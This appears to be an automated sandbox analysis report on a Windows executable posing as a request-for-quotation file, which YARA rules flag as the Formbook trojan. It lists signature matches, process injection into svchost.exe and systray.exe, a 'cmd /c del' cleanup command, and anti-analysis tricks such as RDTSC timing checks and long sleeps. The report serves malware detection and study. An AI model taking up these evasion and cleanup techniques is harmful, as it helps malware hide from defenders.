          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: MKCC-MEC-RFQ-115-2024.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7752, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: systray.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@12/5
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014A2D5 GetLastError,FormatMessageW,1_2_0014A2D5
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00138713 AdjustTokenPrivileges,CloseHandle,1_2_00138713
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00138CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00138CC3
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0014B59E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0015F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_0015F121
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014C602 CoInitialize,CoCreateInstance,CoUninitialize,1_2_0014C602
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_000E4FE9
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeFile created: C:\Users\user\AppData\Local\Temp\aut82C5.tmpJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeCommand line argument: SystemTray_Main4_2_006713B0
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: MKCC-MEC-RFQ-115-2024.exeReversingLabs: Detection: 39%
          Source: unknownProcess created: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: MKCC-MEC-RFQ-115-2024.exeStatic file information: File size 1081856 > 1048576
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: systray.pdb source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0015C304 LoadLibraryA,GetProcAddress,1_2_0015C304
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00108B85 push ecx; ret 1_2_00108B98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041793E push eax; ret 2_2_00417942
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A99E pushfd ; ret 2_2_0040A99F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E343 push eax; retf 2_2_0040E344
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DB1D push edx; ret 2_2_0041DC78
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416CD6 push eax; ret 2_2_00416CD9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4FB push eax; ret 2_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E552 push dword ptr [B4E3C852h]; ret 2_2_0041E577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D55C push eax; ret 2_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416627 push 00000000h; retf 2_2_00416629
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041B714 push ecx; ret 2_2_0041B715
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300225F pushad ; ret 2_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030027FA pushad ; ret 2_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300283D push eax; iretd 2_2_03002858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1EB1E push esp; retn 0000h2_2_02F1EB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1EB02 push esp; retn 0000h2_2_02F1EB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1E9B5 push esp; retn 0000h2_2_02F1EAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FEB1E push esp; retn 0000h3_2_0B1FEB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FEB02 push esp; retn 0000h3_2_0B1FEB03
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FE9B5 push esp; retn 0000h3_2_0B1FEAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1F9B5 push esp; retn 0000h3_2_10D1FAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1FB1E push esp; retn 0000h3_2_10D1FB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1FB02 push esp; retn 0000h3_2_10D1FB03
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00671B3D push ecx; ret 4_2_00671B50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D127FA pushad ; ret 4_2_04D127F9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D1225F pushad ; ret 4_2_04D127F9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D1283D push eax; iretd 4_2_04D12858
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_000E4A35
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001655FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_001655FD
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001033C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_001033C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeAPI/Special instruction interceptor: Address: EF3254
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818D944
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818D504
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818D544
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 2E59904 second address: 2E5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 2E59B6E second address: 2E59B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1350Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8589Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 2643Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 7328Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-99452
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeAPI coverage: 5.0 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.1 %
          Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 2.2 %
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep count: 1350 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep time: -2700000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep count: 8589 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8132Thread sleep time: -17178000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940Thread sleep count: 2643 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940Thread sleep time: -5286000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940Thread sleep count: 7328 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940Thread sleep time: -14656000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00144696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00144696
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014C93C FindFirstFileW,FindClose,1_2_0014C93C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0014C9C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0014F200
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0014F35D
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0014F65E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00143A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00143A2B
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00143D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00143D4E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0014BF27
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_000E4AFE
